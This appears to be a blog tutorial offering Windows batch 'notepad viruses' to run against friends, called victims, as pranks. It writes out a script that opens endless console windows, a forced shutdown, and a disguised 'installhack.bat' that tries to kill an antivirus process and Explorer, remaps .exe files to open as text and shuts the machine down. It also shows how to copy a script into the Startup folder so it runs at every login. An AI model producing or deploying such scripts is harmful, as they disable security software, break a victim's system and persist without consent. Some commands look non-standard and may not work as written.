Playing with Notepad (Fun simple Programs) - MiniVirus Examples



Hello all! Today we are going to show you some of the harmless notepad viruses. Use the following scripts (Some might work in windows 7 or some in Xp) to annoy any friend. Just open notepad od windows and save them as anything.bat and when the victim will run them action will be taken.

Open Unlimited Windows Until Restart :

Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2

:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1

Shutdown Computer:
@echo off
shutdown -s -t 5 -c "Shutdown"
Wrong app association with files:
Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. associate a exe file with txt (when opening exe files, it will go to notepad)
4. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
5. Shutdown
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
cls
shutdown
How to add created programs in StartUp:

1) For this u can use the simple code below .. (adcd is you bat file name)
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
and then the rest of the code. save it as abcd.bat when ever you will run it it will be saved in your start ups.. 

Note: We've shared some notepad programming instances to irritate your close friends but don't misuse. it and don't perform it on nonconsenting individuals.